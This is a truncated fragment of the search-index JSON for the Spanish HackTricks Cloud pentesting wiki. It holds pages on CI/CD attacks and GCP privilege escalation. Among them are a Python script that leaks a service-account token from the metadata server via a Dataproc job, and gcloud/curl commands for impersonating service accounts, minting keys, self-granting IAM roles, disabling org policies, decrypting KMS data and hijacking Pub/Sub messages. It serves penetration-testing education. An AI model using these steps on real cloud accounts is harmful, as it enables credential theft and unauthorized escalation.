mbs":9,"title":1},"972":{"body":13,"breadcrumbs":11,"title":3},"973":{"body":6,"breadcrumbs":14,"title":6},"974":{"body":68,"breadcrumbs":9,"title":1},"975":{"body":4,"breadcrumbs":18,"title":5},"976":{"body":61,"breadcrumbs":18,"title":5},"977":{"body":667,"breadcrumbs":17,"title":4},"978":{"body":68,"breadcrumbs":14,"title":1},"979":{"body":65,"breadcrumbs":11,"title":3},"98":{"body":37,"breadcrumbs":7,"title":2},"980":{"body":6,"breadcrumbs":9,"title":1},"981":{"body":52,"breadcrumbs":9,"title":1},"982":{"body":131,"breadcrumbs":9,"title":1},"983":{"body":26,"breadcrumbs":10,"title":2},"984":{"body":82,"breadcrumbs":10,"title":2},"985":{"body":75,"breadcrumbs":15,"title":7},"986":{"body":9,"breadcrumbs":10,"title":2},"987":{"body":70,"breadcrumbs":10,"title":2},"988":{"body":65,"breadcrumbs":11,"title":3},"989":{"body":0,"breadcrumbs":9,"title":1},"99":{"body":40,"breadcrumbs":8,"title":3},"990":{"body":183,"breadcrumbs":9,"title":1},"991":{"body":70,"breadcrumbs":10,"title":2},"992":{"body":71,"breadcrumbs":10,"title":2},"993":{"body":93,"breadcrumbs":26,"title":18},"994":{"body":25,"breadcrumbs":10,"title":2},"995":{"body":44,"breadcrumbs":9,"title":1},"996":{"body":39,"breadcrumbs":9,"title":1},"997":{"body":43,"breadcrumbs":9,"title":1},"998":{"body":87,"breadcrumbs":10,"title":2},"999":{"body":65,"breadcrumbs":12,"title":4}},"docs":{"0":{"body":"Reading time: 2 minutes tip Aprende y practica AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Apoya a HackTricks Revisa los planes de suscripción ! Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live . Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repos de github. Los logotipos y el diseño en movimiento de Hacktricks son de @ppiernacho .","breadcrumbs":"HackTricks Cloud » HackTricks Cloud","id":"0","title":"HackTricks Cloud"},"1":{"body":"bash # Download latest version of hacktricks cloud\ngit clone https://github.com/HackTricks-wiki/hacktricks-cloud\n# Run the docker container indicating the path to the hacktricks-cloud folder\ndocker run -d --rm -p 3377:3000 --name hacktricks_cloud -v $(pwd)/hacktricks-cloud:/app ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image bash -c \"cd /app && git pull && MDBOOK_PREPROCESSOR__HACKTRICKS__ENV=dev mdbook serve --hostname 0.0.0.0\" Tu copia local de HackTricks Cloud estará disponible en http://localhost:3377 después de un minuto.","breadcrumbs":"HackTricks Cloud » Ejecutar HackTricks Cloud Localmente","id":"1","title":"Ejecutar HackTricks Cloud Localmente"},"10":{"body":"La forma más común de definir un pipeline es utilizando un archivo de configuración CI alojado en el repositorio que el pipeline construye. Este archivo describe el orden de los trabajos ejecutados, las condiciones que afectan el flujo y la configuración del entorno de construcción. Estos archivos generalmente tienen un nombre y formato consistentes, por ejemplo — Jenkinsfile (Jenkins), .gitlab-ci.yml (GitLab), .circleci/config.yml (CircleCI) y los archivos YAML de GitHub Actions ubicados en .github/workflows. Cuando se activa, el trabajo del pipeline extrae el código de la fuente seleccionada (por ejemplo, commit / rama) y ejecuta los comandos especificados en el archivo de configuración CI contra ese código. Por lo tanto, el objetivo final del atacante es de alguna manera comprometer esos archivos de configuración o los comandos que ejecutan .","breadcrumbs":"Pentesting CI/CD Methodology » Metodología de Pentesting de Pipelines","id":"10","title":"Metodología de Pentesting de Pipelines"},"100":{"body":"En https://github.com/organizations//settings/actions es posible verificar la configuración de las acciones de github para la organización. Es posible deshabilitar el uso de acciones de github por completo, permitir todas las acciones de github , o solo permitir ciertas acciones. También es posible configurar quién necesita aprobación para ejecutar una Acción de Github y los permisos del GITHUB_TOKEN de una Acción de Github cuando se ejecuta.","breadcrumbs":"Github Security » Basic Github Information » Configuración","id":"100","title":"Configuración"},"1000":{"body":"GCP - Dataproc Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Dataproc Privesc » Dataproc","id":"1000","title":"Dataproc"},"1001":{"body":"No pude obtener un shell inverso utilizando este método, sin embargo, es posible filtrar el token de SA desde el endpoint de metadatos utilizando el método descrito a continuación. Pasos para explotar Coloca el script del trabajo en el GCP Bucket Envía un trabajo a un clúster de Dataproc. Usa el trabajo para acceder al servidor de metadatos. Filtra el token de la cuenta de servicio utilizado por el clúster. python import requests metadata_url = \"http://metadata/computeMetadata/v1/instance/service-accounts/default/token\"\nheaders = {\"Metadata-Flavor\": \"Google\"} def fetch_metadata_token():\ntry:\nresponse = requests.get(metadata_url, headers=headers, timeout=5)\nresponse.raise_for_status()\ntoken = response.json().get(\"access_token\", \"\")\nprint(f\"Leaked Token: {token}\")\nreturn token\nexcept Exception as e:\nprint(f\"Error fetching metadata token: {e}\")\nreturn None if __name__ == \"__main__\":\nfetch_metadata_token() bash # Copy the script to the storage bucket\ngsutil cp gs:/// # Submit the malicious job\ngcloud dataproc jobs submit pyspark gs:/// \\\n--cluster= \\\n--region= tip Aprende y practica AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Apoya a HackTricks Revisa los planes de suscripción ! Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live . Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repos de github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Dataproc Privesc » dataproc.clusters.get, dataproc.clusters.use, dataproc.jobs.create, dataproc.jobs.get, dataproc.jobs.list, storage.objects.create, storage.objects.get","id":"1001","title":"dataproc.clusters.get, dataproc.clusters.use, dataproc.jobs.create, dataproc.jobs.get, dataproc.jobs.list, storage.objects.create, storage.objects.get"},"1002":{"body":"Reading time: 2 minutes tip Aprende y practica AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Apoya a HackTricks Revisa los planes de suscripción ! Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live . Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repos de github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Deploymentmaneger Privesc » GCP - Privesc de Deploymentmanager","id":"1002","title":"GCP - Privesc de Deploymentmanager"},"1003":{"body":"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Deploymentmaneger Privesc » deploymentmanager","id":"1003","title":"deploymentmanager"},"1004":{"body":"Este único permiso te permite lanzar nuevas implementaciones de recursos en GCP con cuentas de servicio arbitrarias. Podrías, por ejemplo, lanzar una instancia de cómputo con un SA para escalar a ella. De hecho, podrías lanzar cualquier recurso listado en gcloud deployment-manager types list En la investigación original se utiliza el script para desplegar una instancia de cómputo, sin embargo, ese script no funcionará. Consulta un script para automatizar la creación, explotación y limpieza de un entorno vulnerable aquí .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Deploymentmaneger Privesc » deploymentmanager.deployments.create","id":"1004","title":"deploymentmanager.deployments.create"},"1005":{"body":"Esto es como el abuso anterior, pero en lugar de crear una nueva implementación, modificas una ya existente (así que ten cuidado) Consulta un script para automatizar la creación, explotación y limpieza de un entorno vulnerable aquí .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Deploymentmaneger Privesc » deploymentmanager.deployments.update","id":"1005","title":"deploymentmanager.deployments.update"},"1006":{"body":"Esto es como el abuso anterior, pero en lugar de crear directamente una nueva implementación, primero te das ese acceso y luego abusas del permiso como se explicó en la sección anterior deploymentmanager.deployments.create .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Deploymentmaneger Privesc » deploymentmanager.deployments.setIamPolicy","id":"1006","title":"deploymentmanager.deployments.setIamPolicy"},"1007":{"body":"https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/ tip Aprende y practica AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Apoya a HackTricks Revisa los planes de suscripción ! Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live . Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repos de github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Deploymentmaneger Privesc » Referencias","id":"1007","title":"Referencias"},"1008":{"body":"Reading time: 8 minutes tip Aprende y practica AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Apoya a HackTricks Revisa los planes de suscripción ! Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live . Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repos de github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » GCP - IAM Privesc","id":"1008","title":"GCP - IAM Privesc"},"1009":{"body":"Encuentra más información sobre IAM en: GCP - IAM, Principals & Org Policies Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » IAM","id":"1009","title":"IAM"},"101":{"body":"Las Acciones de Github generalmente necesitan algún tipo de secretos para interactuar con github o aplicaciones de terceros. Para evitar ponerlos en texto claro en el repositorio, github permite ponerlos como Secretos . Estos secretos pueden configurarse para el repositorio o para toda la organización . Luego, para que la Acción pueda acceder al secreto , necesitas declararlo así: yaml steps:\n- name: Hello world action\nwith: # Set the secret as an input\nsuper_secret:${{ secrets.SuperSecret }}\nenv: # Or as an environment variable\nsuper_secret:${{ secrets.SuperSecret }} Ejemplo usando Bash yaml steps:\n- shell: bash\nenv: SUPER_SECRET:${{ secrets.SuperSecret }}\nrun: |\nexample-command \"$SUPER_SECRET\" warning Los secretos solo pueden ser accedidos desde las Github Actions que los tienen declarados. Una vez configurados en el repositorio o en las organizaciones, los usuarios de github no podrán acceder a ellos nuevamente , solo podrán cambiarlos . Por lo tanto, la única forma de robar secretos de github es poder acceder a la máquina que está ejecutando la Github Action (en ese escenario solo podrás acceder a los secretos declarados para la Action).","breadcrumbs":"Github Security » Basic Github Information » Secretos de Git","id":"101","title":"Secretos de Git"},"1010":{"body":"Un atacante con los permisos mencionados podrá actualizar un rol asignado a ti y darte permisos adicionales a otros recursos como: bash gcloud iam roles update --project --add-permissions Puedes encontrar un script para automatizar la creación, explotación y limpieza de un entorno vulnerable aquí y un script de python para abusar de este privilegio aquí . Para más información, consulta la investigación original .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.roles.update (iam.roles.get)","id":"1010","title":"iam.roles.update (iam.roles.get)"},"1011":{"body":"Un atacante con los permisos mencionados podrá solicitar un token de acceso que pertenece a una Cuenta de Servicio , por lo que es posible solicitar un token de acceso de una Cuenta de Servicio con más privilegios que los nuestros. bash gcloud --impersonate-service-account=\"${victim}@${PROJECT_ID}.iam.gserviceaccount.com\" \\\nauth print-access-token Puedes encontrar un script para automatizar la creación, explotación y limpieza de un entorno vulnerable aquí y un script de python para abusar de este privilegio aquí . Para más información, consulta la investigación original .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccounts.getAccessToken (iam.serviceAccounts.get)","id":"1011","title":"iam.serviceAccounts.getAccessToken (iam.serviceAccounts.get)"},"1012":{"body":"Un atacante con los permisos mencionados podrá crear una clave gestionada por el usuario para una Cuenta de Servicio , lo que nos permitirá acceder a GCP como esa Cuenta de Servicio. bash gcloud iam service-accounts keys create --iam-account /tmp/key.json gcloud auth activate-service-account --key-file=sa_cred.json Puedes encontrar un script para automatizar la creación, explotación y limpieza de un entorno vulnerable aquí y un script de python para abusar de este privilegio aquí . Para más información, consulta la investigación original . Ten en cuenta que iam.serviceAccountKeys.update no funcionará para modificar la clave de un SA porque para hacerlo también se necesita el permiso iam.serviceAccountKeys.create.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccountKeys.create","id":"1012","title":"iam.serviceAccountKeys.create"},"1013":{"body":"Si tienes el permiso iam.serviceAccounts.implicitDelegation en una Cuenta de Servicio que tiene el permiso iam.serviceAccounts.getAccessToken en una tercera Cuenta de Servicio, entonces puedes usar implicitDelegation para crear un token para esa tercera Cuenta de Servicio . Aquí hay un diagrama para ayudar a explicar. Ten en cuenta que según la documentación , la delegación de gcloud solo funciona para generar un token utilizando el método generateAccessToken() . Así que aquí tienes cómo obtener un token utilizando la API directamente: bash curl -X POST \\\n'https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/'\"${TARGET_SERVICE_ACCOUNT}\"':generateAccessToken' \\\n-H 'Content-Type: application/json' \\\n-H 'Authorization: Bearer '\"$(gcloud auth print-access-token)\" \\\n-d '{\n\"delegates\": [\"projects/-/serviceAccounts/'\"${DELEGATED_SERVICE_ACCOUNT}\"'\"],\n\"scope\": [\"https://www.googleapis.com/auth/cloud-platform\"]\n}' Puedes encontrar un script para automatizar la creación, explotación y limpieza de un entorno vulnerable aquí y un script de python para abusar de este privilegio aquí . Para más información, consulta la investigación original .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccounts.implicitDelegation","id":"1013","title":"iam.serviceAccounts.implicitDelegation"},"1014":{"body":"Un atacante con los permisos mencionados podrá firmar cargas útiles arbitrarias en GCP . Por lo tanto, será posible crear un JWT no firmado del SA y luego enviarlo como un blob para que el JWT sea firmado por el SA que estamos atacando. Para más información lee esto . Puedes encontrar un script para automatizar la creación, explotación y limpieza de un entorno vulnerable aquí y un script de python para abusar de este privilegio aquí y aquí . Para más información, consulta la investigación original .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccounts.signBlob","id":"1014","title":"iam.serviceAccounts.signBlob"},"1015":{"body":"Un atacante con los permisos mencionados podrá firmar tokens web JSON (JWTs) bien formados . La diferencia con el método anterior es que en lugar de hacer que Google firme un blob que contiene un JWT, usamos el método signJWT que ya espera un JWT . Esto lo hace más fácil de usar, pero solo puedes firmar JWT en lugar de cualquier byte. Puedes encontrar un script para automatizar la creación, explotación y limpieza de un entorno vulnerable aquí y un script de python para abusar de este privilegio aquí . Para más información, consulta la investigación original .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccounts.signJwt","id":"1015","title":"iam.serviceAccounts.signJwt"},"1016":{"body":"Un atacante con los permisos mencionados podrá agregar políticas IAM a las cuentas de servicio . Puedes abusar de esto para otorgarte a ti mismo los permisos que necesitas para suplantar la cuenta de servicio. En el siguiente ejemplo, nos estamos otorgando el rol roles/iam.serviceAccountTokenCreator sobre el SA interesante: bash gcloud iam service-accounts add-iam-policy-binding \"${VICTIM_SA}@${PROJECT_ID}.iam.gserviceaccount.com\" \\\n--member=\"user:username@domain.com\" \\\n--role=\"roles/iam.serviceAccountTokenCreator\" # If you still have prblem grant yourself also this permission\ngcloud iam service-accounts add-iam-policy-binding \"${VICTIM_SA}@${PROJECT_ID}.iam.gserviceaccount.com\" \\ \\\n--member=\"user:username@domain.com\" \\\n--role=\"roles/iam.serviceAccountUser\" Puedes encontrar un script para automatizar la creación, explotación y limpieza de un entorno vulnerable aquí .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccounts.setIamPolicy","id":"1016","title":"iam.serviceAccounts.setIamPolicy"},"1017":{"body":"El permiso iam.serviceAccounts.actAs es como el permiso iam:PassRole de AWS . Es esencial para ejecutar tareas, como iniciar una instancia de Compute Engine, ya que otorga la capacidad de \"actuar como\" una Cuenta de Servicio, asegurando una gestión segura de permisos. Sin esto, los usuarios podrían obtener acceso indebido. Además, explotar el iam.serviceAccounts.actAs implica varios métodos, cada uno requiriendo un conjunto de permisos, a diferencia de otros métodos que solo necesitan uno. Suplantación de cuenta de servicio Suplantar una cuenta de servicio puede ser muy útil para obtener nuevos y mejores privilegios . Hay tres formas en las que puedes suplantar otra cuenta de servicio : Autenticación usando claves privadas RSA (cubierto arriba) Autorización usando políticas de Cloud IAM (cubierto aquí) Desplegando trabajos en servicios de GCP (más aplicable a la compromisión de una cuenta de usuario)","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccounts.actAs","id":"1017","title":"iam.serviceAccounts.actAs"},"1018":{"body":"Un atacante con los permisos mencionados podrá generar un OpenID JWT. Estos se utilizan para afirmar la identidad y no necesariamente llevan ninguna autorización implícita contra un recurso. Según este interesante post , es necesario indicar la audiencia (servicio donde deseas usar el token para autenticarte) y recibirás un JWT firmado por google indicando la cuenta de servicio y la audiencia del JWT. Puedes generar un OpenIDToken (si tienes acceso) con: bash # First activate the SA with iam.serviceAccounts.getOpenIdToken over the other SA\ngcloud auth activate-service-account --key-file=/path/to/svc_account.json\n# Then, generate token\ngcloud auth print-identity-token \"${ATTACK_SA}@${PROJECT_ID}.iam.gserviceaccount.com\" --audiences=https://example.com Luego puedes usarlo para acceder al servicio con: bash curl -v -H \"Authorization: Bearer id_token\" https://some-cloud-run-uc.a.run.app Algunos servicios que admiten autenticación a través de este tipo de tokens son: Google Cloud Run Google Cloud Functions Google Identity Aware Proxy Google Cloud Endpoints (si se utiliza Google OIDC) Puedes encontrar un ejemplo de cómo crear un token OpenID en nombre de una cuenta de servicio aquí .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccounts.getOpenIdToken","id":"1018","title":"iam.serviceAccounts.getOpenIdToken"},"1019":{"body":"https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/ tip Aprende y practica AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Apoya a HackTricks Revisa los planes de suscripción ! Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live . Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repos de github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » Referencias","id":"1019","title":"Referencias"},"102":{"body":"Github permite crear entornos donde puedes guardar secretos . Luego, puedes dar acceso a la acción de github a los secretos dentro del entorno con algo como: yaml jobs:\ndeployment:\nruns-on: ubuntu-latest\nenvironment: env_name Puedes configurar un entorno para ser accedido por todas las ramas (por defecto), solo ramas protegidas o especificar qué ramas pueden acceder a él. También se puede establecer un número de revisiones requeridas antes de ejecutar una acción utilizando un entorno o esperar un tiempo antes de permitir que las implementaciones continúen.","breadcrumbs":"Github Security » Basic Github Information » Entornos de Git","id":"102","title":"Entornos de Git"},"1020":{"body":"Reading time: 4 minutes tip Aprende y practica AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Apoya a HackTricks Revisa los planes de suscripción ! Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live . Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repos de github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - KMS Privesc » GCP - KMS Privesc","id":"1020","title":"GCP - KMS Privesc"},"1021":{"body":"Información sobre KMS: GCP - KMS Enum Tenga en cuenta que en KMS los permisos no solo son heredados de Organizaciones, Carpetas y Proyectos, sino también de Keyrings .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - KMS Privesc » KMS","id":"1021","title":"KMS"},"1022":{"body":"Puede usar este permiso para desencriptar información con la clave sobre la que tiene este permiso. bash gcloud kms decrypt \\\n--location=[LOCATION] \\\n--keyring=[KEYRING_NAME] \\\n--key=[KEY_NAME] \\\n--version=[KEY_VERSION] \\\n--ciphertext-file=[ENCRYPTED_FILE_PATH] \\\n--plaintext-file=[DECRYPTED_FILE_PATH]","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - KMS Privesc » cloudkms.cryptoKeyVersions.useToDecrypt","id":"1022","title":"cloudkms.cryptoKeyVersions.useToDecrypt"},"1023":{"body":"Un atacante con este permiso podría darse permisos para usar la clave para descifrar información. bash gcloud kms keys add-iam-policy-binding [KEY_NAME] \\\n--location [LOCATION] \\\n--keyring [KEYRING_NAME] \\\n--member [MEMBER] \\\n--role roles/cloudkms.cryptoKeyDecrypter","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - KMS Privesc » cloudkms.cryptoKeys.setIamPolicy","id":"1023","title":"cloudkms.cryptoKeys.setIamPolicy"},"1024":{"body":"Aquí hay un desglose conceptual de cómo funciona esta delegación: La Cuenta de Servicio A tiene acceso directo para descifrar utilizando una clave específica en KMS. La Cuenta de Servicio B recibe el permiso useToDecryptViaDelegation. Esto le permite solicitar a KMS que descifre datos en nombre de la Cuenta de Servicio A. El uso de este permiso es implícito en la forma en que el servicio KMS verifica los permisos cuando se realiza una solicitud de descifrado. Cuando realizas una solicitud de descifrado estándar utilizando la API de Google Cloud KMS (en Python u otro lenguaje), el servicio verifica si la cuenta de servicio solicitante tiene los permisos necesarios . Si la solicitud es realizada por una cuenta de servicio con el permiso useToDecryptViaDelegation , KMS verifica si esta cuenta tiene permiso para solicitar el descifrado en nombre de la entidad que posee la clave . Configuración para la Delegación Definir el Rol Personalizado : Crea un archivo YAML (por ejemplo, custom_role.yaml) que defina el rol personalizado. Este archivo debe incluir el permiso cloudkms.cryptoKeyVersions.useToDecryptViaDelegation. Aquí hay un ejemplo de cómo podría verse este archivo: yaml title: \"KMS Decryption via Delegation\"\ndescription: \"Allows decryption via delegation\"\nstage: \"GA\"\nincludedPermissions:\n- \"cloudkms.cryptoKeyVersions.useToDecryptViaDelegation\" Crea el Rol Personalizado Usando el gcloud CLI : Usa el siguiente comando para crear el rol personalizado en tu proyecto de Google Cloud: bash gcloud iam roles create kms_decryptor_via_delegation --project [YOUR_PROJECT_ID] --file custom_role.yaml Reemplace [YOUR_PROJECT_ID] con su ID de proyecto de Google Cloud. Otorgar el Rol Personalizado a una Cuenta de Servicio : Asigne su rol personalizado a una cuenta de servicio que utilizará este permiso. Use el siguiente comando: bash # Give this permission to the service account to impersonate\ngcloud projects add-iam-policy-binding [PROJECT_ID] \\\n--member \"serviceAccount:[SERVICE_ACCOUNT_B_EMAIL]\" \\\n--role \"projects/[PROJECT_ID]/roles/[CUSTOM_ROLE_ID]\" # Give this permission over the project to be able to impersonate any SA\ngcloud projects add-iam-policy-binding [YOUR_PROJECT_ID] \\\n--member=\"serviceAccount:[SERVICE_ACCOUNT_EMAIL]\" \\\n--role=\"projects/[YOUR_PROJECT_ID]/roles/kms_decryptor_via_delegation\" Reemplace [YOUR_PROJECT_ID] y [SERVICE_ACCOUNT_EMAIL] con su ID de proyecto y el correo electrónico de la cuenta de servicio, respectivamente. tip Aprende y practica AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Apoya a HackTricks Revisa los planes de suscripción ! Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live . Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repos de github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - KMS Privesc » cloudkms.cryptoKeyVersions.useToDecryptViaDelegation","id":"1024","title":"cloudkms.cryptoKeyVersions.useToDecryptViaDelegation"},"1025":{"body":"Reading time: 2 minutes tip Aprende y practica AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Apoya a HackTricks Revisa los planes de suscripción ! Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live . Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repos de github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Orgpolicy Privesc » GCP - Orgpolicy Privesc","id":"1025","title":"GCP - Orgpolicy Privesc"},"1026":{"body":"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Orgpolicy Privesc » orgpolicy","id":"1026","title":"orgpolicy"},"1027":{"body":"Un atacante que aprovecha orgpolicy.policy.set puede manipular las políticas organizacionales, lo que le permitirá eliminar ciertas restricciones que impiden operaciones específicas. Por ejemplo, la restricción appengine.disableCodeDownload generalmente bloquea la descarga del código fuente de App Engine. Sin embargo, al usar orgpolicy.policy.set , un atacante puede desactivar esta restricción, obteniendo así acceso para descargar el código fuente, a pesar de que inicialmente estaba protegido. bash # Get info\ngcloud resource-manager org-policies describe [--folder | --organization | --project ] # Disable\ngcloud resource-manager org-policies disable-enforce [--folder | --organization | --project ] Un script de python para este método se puede encontrar aquí .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Orgpolicy Privesc » orgpolicy.policy.set","id":"1027","title":"orgpolicy.policy.set"},"1028":{"body":"https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/ tip Aprende y practica AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Apoya a HackTricks Revisa los planes de suscripción ! Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live . Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repos de github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Orgpolicy Privesc » Referencias","id":"1028","title":"Referencias"},"1029":{"body":"Reading time: 2 minutes tip Aprende y practica AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Apoya a HackTricks Revisa los planes de suscripción ! Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live . Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repos de github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » GCP - Pubsub Privesc","id":"1029","title":"GCP - Pubsub Privesc"},"103":{"body":"Una acción de Github puede ser ejecutada dentro del entorno de github o puede ser ejecutada en una infraestructura de terceros configurada por el usuario. Varias organizaciones permitirán ejecutar acciones de Github en una infraestructura de terceros ya que suele ser más barato . Puedes listar los runners autoalojados de una organización en https://github.com/organizations//settings/actions/runners La forma de encontrar qué Github Actions se están ejecutando en infraestructura no github es buscar runs-on: self-hosted en la configuración yaml de la acción de Github. No es posible ejecutar una acción de Github de una organización dentro de una caja autoalojada de una organización diferente porque se genera un token único para el Runner al configurarlo para saber a qué runner pertenece. Si el Github Runner personalizado está configurado en una máquina dentro de AWS o GCP , por ejemplo, la acción podría tener acceso al endpoint de metadatos y robar el token de la cuenta de servicio con la que se está ejecutando la máquina.","breadcrumbs":"Github Security » Basic Github Information » Git Action Runner","id":"103","title":"Git Action Runner"},"1030":{"body":"Obtén más información en: GCP - Pub/Sub Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » PubSub","id":"1030","title":"PubSub"},"1031":{"body":"Las instantáneas de los temas contienen los mensajes actuales no reconocidos y cada mensaje después de este . Podrías crear una instantánea de un tema para acceder a todos los mensajes , evitando acceder al tema directamente .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » pubsub.snapshots.create","id":"1031","title":"pubsub.snapshots.create"},"1032":{"body":"Asigna los permisos anteriores a ti.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » pubsub.snapshots.setIamPolicy","id":"1032","title":"pubsub.snapshots.setIamPolicy"},"1033":{"body":"Puedes crear una suscripción push en un tema que enviará todos los mensajes recibidos a la URL indicada.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » pubsub.subscriptions.create","id":"1033","title":"pubsub.subscriptions.create"},"1034":{"body":"Establece tu propia URL como punto final push para robar los mensajes.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » pubsub.subscriptions.update","id":"1034","title":"pubsub.subscriptions.update"},"1035":{"body":"Accede a los mensajes utilizando la suscripción.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » pubsub.subscriptions.consume","id":"1035","title":"pubsub.subscriptions.consume"},"1036":{"body":"Otórgate cualquiera de los permisos anteriores. tip Aprende y practica AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Apoya a HackTricks Revisa los planes de suscripción ! Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live . Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repos de github.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Pubsub Privesc » pubsub.subscriptions.setIamPolicy","id":"1036","title":"pubsub.subscriptions.setIamPolicy"},"1037":{"body":"Reading time: 2 minutes tip Aprende y practica AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Apoya a HackTricks Revisa los planes de suscripción ! Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live . Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repos de 